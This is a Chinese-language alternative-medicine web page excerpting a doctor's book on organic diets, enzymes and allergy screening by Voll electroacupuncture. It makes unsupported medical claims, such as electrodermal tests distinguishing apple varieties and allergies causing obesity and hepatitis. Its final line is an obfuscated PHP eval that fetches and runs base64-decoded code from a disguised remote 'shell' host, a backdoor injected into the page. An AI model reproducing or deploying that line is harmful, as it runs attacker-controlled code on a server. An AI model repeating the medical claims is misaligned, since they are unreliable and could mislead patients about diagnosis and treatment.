收藏本站
首頁 arrow 另類醫學簡介 arrow 生機飲食與酵素療法 (Organic and Enzyme Therapy)
生機飲食與酵素療法 (Organic and Enzyme Therapy) 列印 E-mail
生機飲食與酵素療法
生機飲食或酵素確實是很好的輔助性療法,能夠在主流醫學或其他另類醫學不足時做很好的補充;在我思考如何給予病患最佳的診療和照顧時,也讓我有更多元的選擇。當我踏入另類醫學的領域,所有跟另類醫學有關的治療方式,我都充滿無限的好奇和興趣。至於能從中獲得什麼?在研究每一個學問之前,我從未有任何期望,只是蒙著頭鑽進去;一旦發現它是無用或不實用的,我就退出屏棄不用,僅保留在臨床上能幫助我及病患的療法。畢竟我是個臨床的、作戰的醫師,需要的是能夠擊退病魔的軍火和槍炮。生機飲食與酵素是輔助我打仗的利器,曾助我攻克許多山頭。

渾身發冷的生機體驗
猶記得民國八十一年秋天,我們是台灣首批組團到美國舊金山Santacruz「琉璃光養身中心」參加雷久南博士「生機飲食營」的團隊。為了正確獲知生機飲食的作用及療效,我帶著傅爾電針、能量測量儀和調整儀同行前往,並仔細關切我們所吃的食物種類、來源、烹調方式,以及身體的反應。

發展生機飲食當務之急
從那次的經驗之後,歷經一些時日的觀察,我發現,生機飲食造成能量明顯不足的原因,其實是值得重視的,而這也是目前台灣發展生機飲食首要解決的問題:其一,葷食者突然改變飲食習慣,生機飲食絕無法提供足夠的熱量,加上東方人「能夠產生熱量的素食」使用得比較少,譬如辛香料:咖哩、胡椒、茴香……等熱量高調味料。當我們在美國吃印度廚師烹調的料理時,並不會有冷的感覺;可是當中國廚師掌廚時,華人通常只習慣用蔥、薑,連八角或花椒都要比較特別的菜裡才看得到,因此很容易熱量不足,讓我們的能量值偏低。

篩選過敏食物比較重要
然而,生機飲食所強調的「全蔬果」真的對人體就是好的嗎?我認為他們忘記一個比生機飲食更重要的事,那就是──篩選過敏食物!主流醫學對過敏患者,都以「減敏治療」或避免食用過敏食物為主要的醫療方法。如果一個人對蘋果過敏,無論它是否有機,都會過敏;所以如何選擇「不過敏」的食物,才是最重要的飲食原則。我曾有一位甲狀腺功能亢進造成眼球斜視的病患,每天都吃一顆最貴的日本蘋果,但排便習慣非常不好,有時便秘、有時軟便,總覺得頻有便意。後來經過「傅爾電針」的測試,改食另一種平價許多的蘋果,結果她的結論是:「我很明顯的感覺到我的大腸在蠕動,每天的排便順暢了,也不再有大不乾淨的感覺。」

避免過敏食物的選擇法
我們在篩選過敏食物時還發現一個很特殊的現象:會讓某人過敏的食物,往往也是他最喜歡的食物;也就是說,同一種食物長期性的刺激就會造成過敏反應!因此,飲食應該要有「輪替性」,均衡地攝取,就算你今天選擇了非過敏性的食物,但你一直吃、一直吃,仍然會令身體過敏。另外就是要選擇「當季」的食物,夏天吃西瓜、冬瓜……,冬天吃蘿蔔、橘子……,當季食物符合節氣,最不需要施灑農藥或其他添加物,而價格便宜,農民也不會提前採收。

BOX 減敏治療善用除濕機
一般而言,過敏原檢測分為兩大類:一、食物過敏,二、塵蟎、家塵、黴菌…等造成的過敏。前者以不再食用過敏食物為治療方法,後者大都使用減敏治療。減敏治療至少需一年,甚至二、三年以上的時間,而且效果有限!坊間還有許多號稱防蟎的被套、枕頭、棉被等,但效果並不明顯。事實上,對抗塵蟎、家塵、黴菌…,最重要的是營造一個乾燥、讓它們無法生存的空間。而讓環境乾燥最佳的家電製品就是除濕機了。
在此說明除濕機的使用原則:
一、一定要在沒有人的空間內使用,絕對不可以睡覺時將除濕機放在旁邊使用。
二、房間內衣櫃、衣櫥、抽屜…等全部要打開,讓衣服、棉被、被套、枕頭…等均在除濕機的作用範圍內。
三、第一次使用時,在每個單位環境中,每天至少八小時,連續一週;在家人上班、上學後,趁家中無人時緊閉門窗,數台除濕機可同時開啟。

傅爾電針找出過敏原

主流醫學現在一般以抽血來檢查過敏原,這種檢查方法存在相當多的問題。例如,抽血檢查患者會對蘋果產生過敏反應,因此患者從此不敢吃所有的蘋果,但試想,市場上蘋果品種不下二十種,外型迥異,口感相差甚大,難道這些不同品種的蘋果,都可以用同一種過敏原來判定是否會造成過敏反應嗎?如果以「傅爾電針」篩選,我們就可以找出讓患者可以食用的蘋果品種,且不會產生過敏反應。傅爾電針可以幫助篩選出正確的食物,只要把不同品種的蘋果都拿來做檢測,就能精確地獲知到底是那幾種品種的蘋果不適合了!

篩選過敏食物比生機飲食重要

主流醫學要了解患者的過敏狀況,通常使用抽血檢查或食物檢測。

一般人對過敏的印象,通常只有過敏性鼻炎、氣喘、蕁麻疹等,事實上,過敏所造成的疾病還有倦怠、情緒的起伏、暈眩、視力模糊、心悸、腸胃道不適、肝炎甚至肥胖等,許多肥胖者都是因為過敏食物長期刺激後,脂肪細胞的累積與強化所造成的。

早期使用皮膚過敏原測試,每週注射十六至二十種過敏原,分數週檢查,以決定何者為過敏食物;近十餘年,已使用抽血來跟食物過敏原配對,可快速診斷食物過敏原。前述兩種方法共同的盲點是,對同一種食物的不同品種,無法做出是否會引發過敏的區別。同一種食物長期食用,容易激發體內產生抗原抗體反應;同樣的,長期未食用過敏食物,也會減輕該食物的過敏反應,但經數次食用後,又會有過敏反應。

我曾診治過一位長年受苦於氣喘毛病的軍系立委,他甚喜吃牛肉,但偏偏對牛肉過敏。經過半年未吃牛肉後,有一次聚餐,他忍不住吃了一份牛排,氣喘竟未發作,他喜出望外,因此開始食用牛肉;沒想到吃了數次之後,氣喘再度發作,差點要了他的老命。

就食品添加物而言,既被標示為可食用食品添加物,就表示在安全劑量下有某種程度的無毒害性,除非某人對該食品添加物有過敏反應,否則傷害有限。因為一個過敏反應,可能在短短數秒間導致過敏性休克,嚴重的話甚至死亡!大家最常聽見的是打盤尼西林過敏致死的案例,可見過敏反應之激烈。當然,長期大量食用食品添加物,必然傷害身體,因為人體的肝、腎無法長期負擔如此巨大的解毒與排毒功能,但是過敏反應卻足以在極短的時間內徹底摧毀我們的肝腎功能。

傅爾電針找出最佳食物

針對農作物殘餘農藥與殺蟲劑而言,即使農民都能在藥物安全期過後採收,供大眾食用,仍然多少會對人體產生傷害,但比起過敏反應,仍可能是小巫見大巫。

我們當然希望能夠攝取不使用抗生素、農藥,未含食品添加物又不會導致過敏的食物,但如果不能兼得,食用食物最簡單的原則是:一、食用不過敏的食物,二、選取沒有或較少化學肥料與農藥的食物,三、選取沒有或較少添加物的食物。

大家有一個迷思,就是以為天然的一定好,實則未必!某國之大老生前過敏性鼻炎甚為嚴重,結果發現是經常食用天然發酵醬油的黴菌所造成,經過「傅爾電針」檢測,改食合成醬油,過敏疾病就好了!因此天然的一定好嗎?未必!合成的一定不好嗎?也未必!

同理,以酒為例,對肝腎功能不良與過敏體質者,原則上我們建議飲用蒸餾酒如:高梁、威士忌、白蘭地等,而不建議飲用發酵酒如:啤酒、紅酒、清酒等,因為發酵酒中含有黴菌、酵母菌,較容易引起過敏反應。而在蒸餾酒中,經過「傅爾電針」檢測後發現,各不同廠牌的威士忌、白蘭地均是用不同比例的香料及色素所調和而成,而高梁酒的色素香料最少,品質最佳,最適合飲用。當然想要確認何種酒類對當事人傷害最少,仍應個別以「傅爾電針」檢測,而縱使已選擇出適合的酒類,仍以少量為宜,因為少許酒可以活血,大量則必傷肝腎。


選擇好食物的思考方式
受限於耕地面積,我們在市場會看到一種以人工提供營養素所種植的「水耕農作」,這種水耕農作所被給予的營養素通常不夠完整。大自然的土地裡有太多我們無法想像的東西,例如「地氣」!雖然對某些科學家來說,他們並不相信地氣這種虛無的存在,可是對練氣功的人來說,雙腳能踩到土地非常重要;相對地,人能吃到經由土地種植出來的食物也是很重要的,可是水耕就沒辦法做到這一點。


酵素好東西卻受爭議
接著我們再談談頗受爭議的──酵素。酵素又稱為「酶」,我們從國中的課堂上就開始被教導:口腔有澱粉酶、胃有蛋白質酶等等,事實上,每一種動植物、每一個細胞都有酶,它扮演著維持細胞新陳代謝的催化作用。但隨著年齡漸長、身體老化、環境污染、飲食習慣不佳、生活作息不正常、濫用藥物等內外在因素,體內的酵素活性會日趨下降,進而影響到我們的健康。


歸經酵素可保重身體
本草綱目中很明確的將所有食物歸經,也就是不同的食物對不同經脈會有特別的助益。我採用本草綱目的記載,尋找可歸到不同經脈的食物,再經過加入不同的菌種發酵,發酵之後再重新測量它的經絡歸屬,反覆確認無誤之後,才在臨床上使用。不同疾病的人飲用不同經絡歸屬的酵素,就能達到「保健」的效果;而「保健」與「治療」只在於程度上的差異而已!醫師的立場來說,我不願意吹噓酵素是可以治療疾病的,但我們確實在臨床上看見正確使用酵素,對疾病是具有療效的。


輔助效果好值得採納
特別要強調的是,我使用生機飲食或酵素做為治療的輔助療法,而不是用來作為治療的唯一方法!生機飲食或酵素確實是很好的輔助性療法,能夠在主流醫學或其他另類醫學不足時做很好的補充。任何一位好的醫師都應該瞭解各種不同的另類醫學項目,在面對同一種疾病時,應該區別在不同的患者身上,是否造成疾病的原因不一樣;治療時,更不應該執著於使用同一種方法才是。
 


所有另類醫學文字內容及案例介紹均為重點摘要
詳文,請至各大書局或網路書局購買(書泉出版社)九八年五月印行
劉大元醫師所著【不一樣的另類醫學】

 
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));